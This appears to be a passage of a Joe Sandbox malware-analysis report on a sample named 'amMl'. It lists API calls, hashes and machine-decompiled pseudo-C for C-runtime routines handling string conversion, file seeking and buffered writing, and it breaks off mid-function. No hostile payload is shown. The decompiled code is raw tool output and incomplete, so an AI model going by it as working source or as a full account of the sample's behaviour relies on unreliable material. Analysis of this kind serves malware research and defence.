                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                      • API String ID: 1646373207-3105848591
                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlen.KERNEL32(?), ref: 005B1B6D
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 005B1B96
                                                                      • GetLastError.KERNEL32 ref: 005B1BA7
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 005B1BBF
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 005B1BE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3322701435-0
                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction ID: 859f9b5943f54f41986ed50512bc1cb0ca4cd3a24e890e68ec14ec48eaabf096
                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction Fuzzy Hash: 7F11C4315007547BD3309715CC98FA77F6CFBC6BA9F408114FD459A281D621BC04C6B8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				signed int _t12;
                                                                      				void* _t21;
                                                                      				int _t25;
                                                                      				void* _t30;
                                                                      				int _t32;
                                                                      				char* _t35;
                                                                      
                                                                      				_t21 = __edx;
                                                                      				_t35 = _a4;
                                                                      				_t17 = __ecx;
                                                                      				if(_t35 != 0) {
                                                                      					_t25 = lstrlenA(_t35) + 1;
                                                                      					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                      					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                                                                      					asm("sbb esi, esi");
                                                                      					_t30 =  ~_t12 + 1;
                                                                      					if(_t30 != 0) {
                                                                      						_t12 = GetLastError();
                                                                      						if(_t12 == 0x7a) {
                                                                      							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                      							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                      							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                      							asm("sbb esi, esi");
                                                                      							_t30 =  ~_t12 + 1;
                                                                      						}
                                                                      						if(_t30 != 0) {
                                                                      							_t12 = E00401030();
                                                                      						}
                                                                      					}
                                                                      					return _t12;
                                                                      				} else {
                                                                      					 *__ecx = _t35;
                                                                      					return __eax;
                                                                      				}
                                                                      			}












                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3322701435-0
                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __fileno.LIBCMT ref: 005BC9E3
                                                                      • __locking.LIBCMT ref: 005BC9F8
                                                                        • Part of subcall function 005BC228: __getptd_noexit.LIBCMT ref: 005BC228
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 630670418-0
                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction ID: 427126178eeeca7fb8d918f996eccd81bc4eed112a630e07ee1ff0dc58c4075d
                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction Fuzzy Hash: 19518F71E00209ABDB10CF68C986BEDBFB1FF45354F6481A9D915AB281D730BE40DB88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				signed int _t70;
                                                                      				signed int _t71;
                                                                      				intOrPtr _t73;
                                                                      				signed int _t75;
                                                                      				signed int _t81;
                                                                      				char _t82;
                                                                      				signed int _t84;
                                                                      				intOrPtr* _t86;
                                                                      				signed int _t87;
                                                                      				intOrPtr* _t90;
                                                                      				signed int _t92;
                                                                      				signed int _t94;
                                                                      				void* _t96;
                                                                      				signed char _t98;
                                                                      				signed int _t99;
                                                                      				intOrPtr _t102;
                                                                      				signed int _t103;
                                                                      				intOrPtr* _t104;
                                                                      				signed int _t111;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t115;
                                                                      
                                                                      				_t105 = __esi;
                                                                      				_t97 = __edx;
                                                                      				_t104 = _a4;
                                                                      				_t87 = 0;
                                                                      				_t121 = _t104;
                                                                      				if(_t104 != 0) {
                                                                      					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                      					__eflags =  *(_t104 + 4);
                                                                      					_v8 = _t70;
                                                                      					if(__eflags < 0) {
                                                                      						 *(_t104 + 4) = 0;
                                                                      					}
                                                                      					_push(1);
                                                                      					_push(_t87);
                                                                      					_push(_t70);
                                                                      					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                      					__eflags = _t71 - _t87;
                                                                      					_v12 = _t71;
                                                                      					if(_t71 < _t87) {
                                                                      						L2:
                                                                      						return _t71 | 0xffffffff;
                                                                      					} else {
                                                                      						_t98 =  *(_t104 + 0xc);
                                                                      						__eflags = _t98 & 0x00000108;
                                                                      						if((_t98 & 0x00000108) != 0) {
                                                                      							_t73 =  *_t104;
                                                                      							_t92 =  *(_t104 + 8);
                                                                      							_push(_t105);
                                                                      							_v16 = _t73 - _t92;
                                                                      							__eflags = _t98 & 0x00000003;
                                                                      							if((_t98 & 0x00000003) == 0) {
                                                                      								__eflags = _t98;
                                                                      								if(__eflags < 0) {
                                                                      									L15:
                                                                      									__eflags = _v12 - _t87;
                                                                      									if(_v12 != _t87) {
                                                                      										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                      										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                      											L40:
                                                                      											_t75 = _v16 + _v12;
                                                                      											__eflags = _t75;
                                                                      											L41:
                                                                      											return _t75;
                                                                      										}
                                                                      										_t99 =  *(_t104 + 4);
                                                                      										__eflags = _t99 - _t87;
                                                                      										if(_t99 != _t87) {
                                                                      											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                      											_a4 = _t73 - _t92 + _t99;
                                                                      											_t111 = (_v8 & 0x0000001f) << 6;
                                                                      											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                      											if(__eflags == 0) {
                                                                      												L39:
                                                                      												_t66 =  &_v12;
                                                                      												 *_t66 = _v12 - _a4;
                                                                      												__eflags =  *_t66;
                                                                      												goto L40;
                                                                      											}
                                                                      											_push(2);
                                                                      											_push(0);
                                                                      											_push(_v8);
                                                                      											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                      											if(__eflags != 0) {
                                                                      												_push(0);
                                                                      												_push(_v12);
                                                                      												_push(_v8);
                                                                      												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                      												__eflags = _t81;
                                                                      												if(_t81 >= 0) {
                                                                      													_t82 = 0x200;
                                                                      													__eflags = _a4 - 0x200;
                                                                      													if(_a4 > 0x200) {
                                                                      														L35:
                                                                      														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                      														L36:
                                                                      														_a4 = _t82;
                                                                      														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                      														L37:
                                                                      														if(__eflags != 0) {
                                                                      															_t63 =  &_a4;
                                                                      															 *_t63 = _a4 + 1;
                                                                      															__eflags =  *_t63;
                                                                      														}
                                                                      														goto L39;
                                                                      													}
                                                                      													_t94 =  *(_t104 + 0xc);
                                                                      													__eflags = _t94 & 0x00000008;
                                                                      													if((_t94 & 0x00000008) == 0) {
                                                                      														goto L35;
                                                                      													}
                                                                      													__eflags = _t94 & 0x00000400;
                                                                      													if((_t94 & 0x00000400) == 0) {
                                                                      														goto L36;
                                                                      													}
                                                                      													goto L35;
                                                                      												}
                                                                      												L31:
                                                                      												_t75 = _t81 | 0xffffffff;
                                                                      												goto L41;
                                                                      											}
                                                                      											_t84 =  *(_t104 + 8);
                                                                      											_t96 = _a4 + _t84;
                                                                      											while(1) {
                                                                      												__eflags = _t84 - _t96;
                                                                      												if(_t84 >= _t96) {
                                                                      													break;
                                                                      												}
                                                                      												__eflags =  *_t84 - 0xa;
                                                                      												if( *_t84 == 0xa) {
                                                                      													_t44 =  &_a4;
                                                                      													 *_t44 = _a4 + 1;
                                                                      													__eflags =  *_t44;
                                                                      												}
                                                                      												_t84 = _t84 + 1;
                                                                      												__eflags = _t84;
                                                                      											}
                                                                      											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                      											goto L37;
                                                                      										}
                                                                      										_v16 = _t87;
                                                                      										goto L40;
                                                                      									}
                                                                      									_t75 = _v16;
                                                                      									goto L41;
                                                                      								}
                                                                      								_t81 = E0040BFC1(__eflags);
                                                                      								 *_t81 = 0x16;
                                                                      								goto L31;
                                                                      							}
                                                                      							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                      							_t114 = (_v8 & 0x0000001f) << 6;
                                                                      							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                      							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                      								goto L15;
                                                                      							}
                                                                      							_t103 = _t92;
                                                                      							__eflags = _t103 - _t73;
                                                                      							if(_t103 >= _t73) {
                                                                      								goto L15;
                                                                      							}
                                                                      							_t115 = _t73;
                                                                      							do {
                                                                      								__eflags =  *_t103 - 0xa;
                                                                      								if( *_t103 == 0xa) {
                                                                      									_v16 = _v16 + 1;
                                                                      									_t87 = 0;
                                                                      									__eflags = 0;
                                                                      								}
                                                                      								_t103 = _t103 + 1;
                                                                      								__eflags = _t103 - _t115;
                                                                      							} while (_t103 < _t115);
                                                                      							goto L15;
                                                                      						}
                                                                      						return _t71 -  *(_t104 + 4);
                                                                      					}
                                                                      				}
                                                                      				_t86 = E0040BFC1(_t121);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				 *_t86 = 0x16;
                                                                      				_t71 = E0040E744(__edx, _t104, __esi);
                                                                      				goto L2;
                                                                      			}

                                                                      APIs
                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                      • __locking.LIBCMT ref: 0040C791
                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 2395185920-0
                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 1291973410-0
                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                      • Instruction ID: afd7f4f556a4b1427020b727b7a49a5a7884608ae4ee4503a86ee27d0761e640
                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                      • Instruction Fuzzy Hash: 68418231A00609AFEB249F6988856EEBFB5FF80720F248529E5559B150E7F4FE41CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _fseek_malloc_memset
                                                                      • String ID:
                                                                      • API String ID: 208892515-0
                                                                      • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction ID: 6ec82804641fa7fbcea70460e36997f73a791347a8a3505df7978e5fccc20a98
                                                                      • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction Fuzzy Hash: 9441D672600B154AD730AA2EE90D7A7BAE5BFC0354F140A2DE596C27D0E775F845C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t30;
                                                                      				signed int _t31;
                                                                      				signed int _t32;
                                                                      				signed int _t33;
                                                                      				signed int _t35;
                                                                      				signed int _t39;
                                                                      				void* _t42;
                                                                      				intOrPtr _t43;
                                                                      				void* _t45;
                                                                      				signed int _t48;
                                                                      				signed int* _t53;
                                                                      				void* _t54;
                                                                      				void* _t55;
                                                                      				void* _t57;
                                                                      
                                                                      				_t54 = __ebp;
                                                                      				_t45 = __edx;
                                                                      				_t42 = __ebx;
                                                                      				_t53 = _a4;
                                                                      				if(_t53 == 0) {
                                                                      					L40:
                                                                      					_t31 = _t30 | 0xffffffff;
                                                                      					__eflags = _t31;
                                                                      					return _t31;
                                                                      				} else {
                                                                      					_t43 = _a12;
                                                                      					if(_t43 == 2) {
                                                                      						goto L40;
                                                                      					} else {
                                                                      						_t30 = _t53[0xe];
                                                                      						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                      							goto L40;
                                                                      						} else {
                                                                      							_t48 = _a8;
                                                                      							if(_t53[0x17] != 0x77) {
                                                                      								__eflags = _t43 - 1;
                                                                      								if(_t43 == 1) {
                                                                      									_t48 = _t48 + _t53[0x1a];
                                                                      									__eflags = _t48;
                                                                      								}
                                                                      								__eflags = _t48;
                                                                      								if(_t48 < 0) {
                                                                      									goto L39;
                                                                      								} else {
                                                                      									__eflags = _t53[0x16];
                                                                      									if(__eflags == 0) {
                                                                      										_t33 = _t53[0x1a];
                                                                      										__eflags = _t48 - _t33;
                                                                      										if(_t48 < _t33) {
                                                                      											_t30 = E004054F0(_t42, _t54, _t53);
                                                                      											_t55 = _t55 + 4;
                                                                      											__eflags = _t30;
                                                                      											if(_t30 < 0) {
                                                                      												goto L39;
                                                                      											} else {
                                                                      												goto L27;
                                                                      											}
                                                                      										} else {
                                                                      											_t48 = _t48 - _t33;
                                                                      											L27:
                                                                      											__eflags = _t48;
                                                                      											if(_t48 == 0) {
                                                                      												L38:
                                                                      												return _t53[0x1a];
                                                                      											} else {
                                                                      												__eflags = _t53[0x12];
                                                                      												if(_t53[0x12] != 0) {
                                                                      													L30:
                                                                      													__eflags = _t53[0x1b] - 0xffffffff;
                                                                      													if(_t53[0x1b] != 0xffffffff) {
                                                                      														_t53[0x1a] = _t53[0x1a] + 1;
                                                                      														_t48 = _t48 - 1;
                                                                      														__eflags = _t53[0x1c];
                                                                      														_t53[0x1b] = 0xffffffff;
                                                                      														if(_t53[0x1c] != 0) {
                                                                      															_t53[0xe] = 1;
                                                                      														}
                                                                      													}
                                                                      													__eflags = _t48;
                                                                      													if(_t48 <= 0) {
                                                                      														goto L38;
                                                                      													} else {
                                                                      														while(1) {
                                                                      															_t35 = 0x4000;
                                                                      															__eflags = _t48 - 0x4000;
                                                                      															if(_t48 < 0x4000) {
                                                                      																_t35 = _t48;
                                                                      															}
                                                                      															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                      															_t55 = _t55 + 0xc;
                                                                      															__eflags = _t30;
                                                                      															if(_t30 <= 0) {
                                                                      																goto L39;
                                                                      															}
                                                                      															_t48 = _t48 - _t30;
                                                                      															__eflags = _t48;
                                                                      															if(_t48 > 0) {
                                                                      																continue;
                                                                      															} else {
                                                                      																goto L38;
                                                                      															}
                                                                      															goto L41;
                                                                      														}
                                                                      														goto L39;
                                                                      													}
                                                                      												} else {
                                                                      													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                      													_t55 = _t55 + 4;
                                                                      													_t53[0x12] = _t30;
                                                                      													__eflags = _t30;
                                                                      													if(_t30 == 0) {
                                                                      														goto L39;
                                                                      													} else {
                                                                      														goto L30;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_push(0);
                                                                      										_push(_t48);
                                                                      										_push(_t53[0x10]);
                                                                      										_t53[0x1b] = 0xffffffff;
                                                                      										_t53[1] = 0;
                                                                      										 *_t53 = _t53[0x11];
                                                                      										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                      										__eflags = _t30;
                                                                      										if(_t30 < 0) {
                                                                      											goto L39;
                                                                      										} else {
                                                                      											_t53[0x1a] = _t48;
                                                                      											_t53[0x19] = _t48;
                                                                      											return _t48;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								if(_t43 == 0) {
                                                                      									_t48 = _t48 - _t53[0x19];
                                                                      								}
                                                                      								if(_t48 < 0) {
                                                                      									L39:
                                                                      									_t32 = _t30 | 0xffffffff;
                                                                      									__eflags = _t32;
                                                                      									return _t32;
                                                                      								} else {
                                                                      									if(_t53[0x11] != 0) {
                                                                      										L11:
                                                                      										if(_t48 <= 0) {
                                                                      											L17:
                                                                      											return _t53[0x19];
                                                                      										} else {
                                                                      											while(1) {
                                                                      												_t39 = 0x4000;
                                                                      												if(_t48 < 0x4000) {
                                                                      													_t39 = _t48;
                                                                      												}
                                                                      												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                      												_t55 = _t55 + 0xc;
                                                                      												if(_t30 == 0) {
                                                                      													goto L39;
                                                                      												}
                                                                      												_t48 = _t48 - _t30;
                                                                      												if(_t48 > 0) {
                                                                      													continue;
                                                                      												} else {
                                                                      													goto L17;
                                                                      												}
                                                                      												goto L41;
                                                                      											}
                                                                      											goto L39;
                                                                      										}
                                                                      									} else {
                                                                      										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                      										_t57 = _t55 + 4;
                                                                      										_t53[0x11] = _t30;
                                                                      										if(_t30 == 0) {
                                                                      											goto L39;
                                                                      										} else {
                                                                      											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                      											_t55 = _t57 + 0xc;
                                                                      											goto L11;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L41:
                                                                      			}
                                                                      0x00405d7b
                                                                      0x00405d80
                                                                      0x00405d80
                                                                      0x00405d87
                                                                      0x00405d89
                                                                      0x00405d89
                                                                      0x00405d91
                                                                      0x00405d96
                                                                      0x00405d9b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405da1
                                                                      0x00405da5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405da5
                                                                      0x00000000
                                                                      0x00405d80
                                                                      0x00405d4f
                                                                      0x00405d54
                                                                      0x00405d59
                                                                      0x00405d5c
                                                                      0x00405d61
                                                                      0x00000000
                                                                      0x00405d67
                                                                      0x00405d6f
                                                                      0x00405d74
                                                                      0x00000000
                                                                      0x00405d74
                                                                      0x00405d61
                                                                      0x00405d4d
                                                                      0x00405d43
                                                                      0x00405d38
                                                                      0x00405d20
                                                                      0x00405d14
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _fseek_malloc_memset
                                                                      • String ID:
                                                                      • API String ID: 208892515-0
                                                                      • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                      • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t59;
                                                                      				intOrPtr* _t61;
                                                                      				signed int _t63;
                                                                      				void* _t68;
                                                                      				signed int _t69;
                                                                      				signed int _t72;
                                                                      				signed int _t74;
                                                                      				signed int _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t78;
                                                                      				signed int _t81;
                                                                      				signed int _t82;
                                                                      				signed int _t84;
                                                                      				signed int _t88;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t99;
                                                                      				intOrPtr* _t100;
                                                                      				void* _t101;
                                                                      
                                                                      				_t90 = __edx;
                                                                      				if(_a8 == 0 || _a12 == 0) {
                                                                      					L4:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t100 = _a16;
                                                                      					_t105 = _t100;
                                                                      					if(_t100 != 0) {
                                                                      						_t82 = _a4;
                                                                      						__eflags = _t82;
                                                                      						if(__eflags == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t63 = _t59 | 0xffffffff;
                                                                      						_t90 = _t63 % _a8;
                                                                      						__eflags = _a12 - _t63 / _a8;
                                                                      						if(__eflags > 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t97 = _a8 * _a12;
                                                                      						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                      						_v8 = _t82;
                                                                      						_v16 = _t97;
                                                                      						_t81 = _t97;
                                                                      						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                      							_v12 = 0x1000;
                                                                      						} else {
                                                                      							_v12 =  *(_t100 + 0x18);
                                                                      						}
                                                                      						__eflags = _t97;
                                                                      						if(_t97 == 0) {
                                                                      							L32:
                                                                      							return _a12;
                                                                      						} else {
                                                                      							do {
                                                                      								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                      								__eflags = _t84;
                                                                      								if(_t84 == 0) {
                                                                      									L18:
                                                                      									__eflags = _t81 - _v12;
                                                                      									if(_t81 < _v12) {
                                                                      										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                      										__eflags = _t68 - 0xffffffff;
                                                                      										if(_t68 == 0xffffffff) {
                                                                      											L34:
                                                                      											_t69 = _t97;
                                                                      											L35:
                                                                      											return (_t69 - _t81) / _a8;
                                                                      										}
                                                                      										_v8 = _v8 + 1;
                                                                      										_t72 =  *(_t100 + 0x18);
                                                                      										_t81 = _t81 - 1;
                                                                      										_v12 = _t72;
                                                                      										__eflags = _t72;
                                                                      										if(_t72 <= 0) {
                                                                      											_v12 = 1;
                                                                      										}
                                                                      										goto L31;
                                                                      									}
                                                                      									__eflags = _t84;
                                                                      									if(_t84 == 0) {
                                                                      										L21:
                                                                      										__eflags = _v12;
                                                                      										_t98 = _t81;
                                                                      										if(_v12 != 0) {
                                                                      											_t75 = _t81;
                                                                      											_t90 = _t75 % _v12;
                                                                      											_t98 = _t98 - _t75 % _v12;
                                                                      											__eflags = _t98;
                                                                      										}
                                                                      										_push(_t98);
                                                                      										_push(_v8);
                                                                      										_push(E0040FA20(_t90, _t98, _t100));
                                                                      										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                      										_t101 = _t101 + 0xc;
                                                                      										__eflags = _t74 - 0xffffffff;
                                                                      										if(_t74 == 0xffffffff) {
                                                                      											L36:
                                                                      											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                      											_t69 = _v16;
                                                                      											goto L35;
                                                                      										} else {
                                                                      											_t88 = _t98;
                                                                      											__eflags = _t74 - _t98;
                                                                      											if(_t74 <= _t98) {
                                                                      												_t88 = _t74;
                                                                      											}
                                                                      											_v8 = _v8 + _t88;
                                                                      											_t81 = _t81 - _t88;
                                                                      											__eflags = _t74 - _t98;
                                                                      											if(_t74 < _t98) {
                                                                      												goto L36;
                                                                      											} else {
                                                                      												L27:
                                                                      												_t97 = _v16;
                                                                      												goto L31;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									_t77 = E0040C1FB(_t100);
                                                                      									__eflags = _t77;
                                                                      									if(_t77 != 0) {
                                                                      										goto L34;
                                                                      									}
                                                                      									goto L21;
                                                                      								}
                                                                      								_t78 =  *(_t100 + 4);
                                                                      								__eflags = _t78;
                                                                      								if(__eflags == 0) {
                                                                      									goto L18;
                                                                      								}
